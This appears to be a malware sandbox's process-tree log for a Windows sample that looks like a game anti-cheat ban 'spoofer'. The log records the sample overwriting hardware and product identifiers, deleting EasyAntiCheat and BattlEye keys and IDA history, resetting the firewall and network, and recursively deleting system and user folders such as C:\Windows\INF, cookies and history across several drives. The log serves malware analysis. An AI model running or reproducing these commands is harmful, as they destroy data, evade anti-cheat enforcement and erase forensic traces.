    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:2312
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d Paste-20523-29613-322933892 /f
      4⤵
      Modifies registry key
      PID:4736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Classes\Interface /v ClsidStore /f
    3⤵
    PID:3116
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Classes\Interface /v ClsidStore /f
      4⤵
      PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v _DriverProviderInfo /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:4524
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v _DriverProviderInfo /t REG_SZ /d Paste-20523-29613-322933892 /f
      4⤵
      Modifies registry key
      PID:1060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:2292
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d Paste-20523-29613-322933892 /f
      4⤵
      PID:3088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SettingsRequests /f
    3⤵
    PID:2308
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SettingsRequests /f
      4⤵
      Modifies registry key
      PID:2252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v BackupProductKeyDefault /f
    3⤵
    PID:2596
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v BackupProductKeyDefault /f
      4⤵
      PID:5060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v actionlist /f
    3⤵
    PID:6076
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v actionlist /f
      4⤵
      PID:296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
    3⤵
    PID:2964
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
      4⤵
      Modifies registry key
      PID:3480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist /f
    3⤵
    PID:5068
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist /f
      4⤵
      PID:628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Hex-Rays\IDA\History /f
    3⤵
    PID:4468
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Hex-Rays\IDA\History /f
      4⤵
      PID:1544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Hex-Rays\IDA\History64 /f
    3⤵
    PID:5944
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Hex-Rays\IDA\History64 /f
      4⤵
      Modifies registry key
      PID:4956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
    3⤵
    PID:3772
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
      4⤵
      PID:3548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:5324
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d 2052329613322933892236293254460131186225263207091707123937 /f
      4⤵
      PID:5940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Classes\Installer\Dependencies /v MSICache /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:2924
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Classes\Installer\Dependencies /v MSICache /t REG_BINARY /d 20523296133229338922362932544601311862252632070917071 /f
      4⤵
      PID:6068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TPM\WMI /v WindowsAIKHash /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:4300
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TPM\WMI /v WindowsAIKHash /t REG_BINARY /d 205232961332293389223629325446013118622526320709 /f
      4⤵
      PID:928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientIdValidation /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:3964
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientIdValidation /t REG_BINARY /d 2052329613322933892236293254460131186225263207091707123937 /f
      4⤵
      Modifies registry key
      PID:5664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKCU\SYSTEM\CurrentControlSet\Services\TPM\ODUID /v RandomSeed /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:6128
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\SYSTEM\CurrentControlSet\Services\TPM\ODUID /v RandomSeed /t REG_BINARY /d 2052329613322933892236293254460131186225263207091707123937 /f
      4⤵
      PID:5544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Internet" "Explorer\Migration /v IE" "Installed" "Date /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:2700
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Internet" "Explorer\Migration /v IE" "Installed" "Date /t REG_BINARY /d 2052329613322933892236293254460131186225263 /f
      4⤵
      PID:828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:4584
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t REG_BINARY /d 2052329613322933892236293254460131186225263 /f
      4⤵
      Modifies registry key
      PID:1528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:4432
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t REG_BINARY /d 2052329613322933892236293254460131186225263 /f
      4⤵
      PID:3824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:5440
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d 205232961332293 /f
      4⤵
      Modifies registry key
      PID:4676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:1624
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d 205232961332293 /f
      4⤵
      PID:3116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:1060
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d 205232961332293 /f
      4⤵
      Modifies registry key
      PID:4524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SevilleEventlogManager /v LastEventlogWrittenTime /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:3088
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SevilleEventlogManager /v LastEventlogWrittenTime /t REG_QWORD /d 205232961332293 /f
      4⤵
      Modifies registry key
      PID:2292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Control\Notifications /v 418A073AA3BC8075 /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:2252
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\System\CurrentControlSet\Control\Notifications /v 418A073AA3BC8075 /t REG_BINARY /d 2052329613322933892236293254460131186225263207091707123937 /f
      4⤵
      PID:2308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Kernel-EventTracing/Admin /v OwningPublisher /t REG_SZ /d {%random%-%random%-%random%%random%} /f
    3⤵
    PID:5060
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Kernel-EventTracing/Admin /v OwningPublisher /t REG_SZ /d {20523-29613-322933892} /f
      4⤵
      PID:2596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\EasyAntiCheat /f
    3⤵
    PID:296
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\WOW6432Node\EasyAntiCheat /f
      4⤵
      PID:6076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
    3⤵
    PID:5856
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
      4⤵
      Modifies registry key
      PID:3604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
    3⤵
    PID:628
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
      4⤵
      Modifies registry key
      PID:5068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh winsock reset
    3⤵
    PID:336
  - - C:\Windows\system32\netsh.exe
      netsh winsock reset
      4⤵
      PID:5496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh winsock reset catalog
    3⤵
    PID:5548
  - - C:\Windows\system32\netsh.exe
      netsh winsock reset catalog
      4⤵
      PID:5476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh int ip reset
    3⤵
    PID:4760
  - - C:\Windows\system32\netsh.exe
      netsh int ip reset
      4⤵
      PID:6080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall reset
    3⤵
    PID:4224
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall reset
      4⤵
      Modifies Windows Firewall
      PID:836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh int reset all
    3⤵
    PID:2428
  - - C:\Windows\system32\netsh.exe
      netsh int reset all
      4⤵
      PID:2296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh int ipv4 reset
    3⤵
    PID:4452
  - - C:\Windows\system32\netsh.exe
      netsh int ipv4 reset
      4⤵
      PID:3940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh int ipv6 reset
    3⤵
    PID:3116
  - - C:\Windows\system32\netsh.exe
      netsh int ipv6 reset
      4⤵
      PID:4676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ipconfig /release
    3⤵
    PID:1364
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /release
      4⤵
      Gathers network information
      PID:1436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ipconfig /renew
    3⤵
    PID:2668
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /renew
      4⤵
      Gathers network information
      PID:4236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ipconfig /flushdns
    3⤵
    PID:3480
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /flushdns
      4⤵
      Gathers network information
      PID:5472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:3104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\FortniteGame\Saved
    3⤵
    PID:292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\INF
    3⤵
    PID:2628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\ProgramData\%username%\Microsoft\XboxLive\NSALCache
    3⤵
    PID:4160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\Public\Documents
    3⤵
    PID:3248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\Prefetch
    3⤵
    PID:5284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:2300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\CrashReportClient
    3⤵
    PID:1528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\temp
    3⤵
    PID:5080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Microsoft\Windows\SettingSync\metastore
    3⤵
    PID:216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:4800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\ProgramData\Microsoft\Windows\WER\Temp
    3⤵
    PID:636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\AMD\DxCache
    3⤵
    PID:2344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "C:\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:4584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\Prefetch
    3⤵
    PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q C:\Users\username%\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\*.*
    3⤵
    PID:2968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q C:\Users\%username%\AppData\Local\Microsoft\Windows\WebCache\*.*
    3⤵
    PID:2860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC
    3⤵
    PID:2596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalCache
    3⤵
    PID:1364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings
    3⤵
    PID:2668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "C:\Program Files\Epic Games\Fortnite\Engine\Plugins
    3⤵
    PID:5352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "C:\Program Files\Epic Games\Fortnite\FortniteGame\Plugins
    3⤵
    PID:4380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "C:\Program Files\Epic Games\Fortnite\FortniteGame\PersistentDownloadDir
    3⤵
    PID:4472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "C:\Program Files\Epic Games\Fortnite\FortniteGame\Config
    3⤵
    PID:1664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "C:\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:4404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:5704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q C:\ProgramData\Microsoft\DataMart\PaidWiFi\NetworksCache
    3⤵
    PID:872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q C:\ProgramData\Microsoft\DataMart\PaidWiFi\Rules
    3⤵
    PID:5324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Cache
    3⤵
    PID:5476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Temp
    3⤵
    PID:2832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache
    3⤵
    PID:3372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies
    3⤵
    PID:968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Microsoft\Windows\History
    3⤵
    PID:2760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\Intel
    3⤵
    PID:6128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
    3⤵
    PID:3248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "C:\Users\%username%\AppData\Local\Microsoft\Feeds Cache
    3⤵
    PID:5284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\FortniteGame\Saved
    3⤵
    PID:3940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Windows\INF
    3⤵
    PID:3728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\ProgramData\%username%\Microsoft\XboxLive\NSALCache
    3⤵
    PID:3824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\Public\Documents
    3⤵
    PID:336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Windows\Prefetch
    3⤵
    PID:6068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\CrashReportClient
    3⤵
    PID:3116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Windows\temp
    3⤵
    PID:5440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Microsoft\Windows\SettingSync\metastore
    3⤵
    PID:1448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:4236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\ProgramData\Microsoft\Windows\WER\Temp
    3⤵
    PID:296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\AMD\DxCache
    3⤵
    PID:5348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "D:\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:3148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Windows\Prefetch
    3⤵
    PID:4380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q D:\Users\username%\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\*.*
    3⤵
    PID:5808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q D:\Users\%username%\AppData\Local\Microsoft\Windows\WebCache\*.*
    3⤵
    PID:3396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC
    3⤵
    PID:5944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalCache
    3⤵
    PID:4536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings
    3⤵
    PID:652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "D:\Program Files\Epic Games\Fortnite\Engine\Plugins
    3⤵
    PID:4312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "D:\Program Files\Epic Games\Fortnite\FortniteGame\Plugins
    3⤵
    PID:2428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "D:\Program Files\Epic Games\Fortnite\FortniteGame\PersistentDownloadDir
    3⤵
    PID:884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "D:\Program Files\Epic Games\Fortnite\FortniteGame\Config
    3⤵
    PID:2564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "D:\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:2760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:4456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q D:\ProgramData\Microsoft\DataMart\PaidWiFi\NetworksCache
    3⤵
    PID:1652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q D:\ProgramData\Microsoft\DataMart\PaidWiFi\Rules
    3⤵
    PID:5792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Cache
    3⤵
    PID:5284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Temp
    3⤵
    PID:216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache
    3⤵
    PID:4432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies
    3⤵
    PID:2700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Microsoft\Windows\History
    3⤵
    PID:4360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\Intel
    3⤵
    PID:5736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
    3⤵
    PID:2968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "D:\Users\%username%\AppData\Local\Microsoft\Feeds Cache
    3⤵
    PID:2840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:3948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\FortniteGame\Saved
    3⤵
    PID:3704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Windows\INF
    3⤵
    PID:1512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\ProgramData\%username%\Microsoft\XboxLive\NSALCache
    3⤵
    PID:5904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\Public\Documents
    3⤵
    PID:292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Windows\Prefetch
    3⤵
    PID:5608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:2252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\CrashReportClient
    3⤵
    PID:5716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Windows\temp
    3⤵
    PID:1752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\Microsoft\Windows\SettingSync\metastore
    3⤵
    PID:836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:628
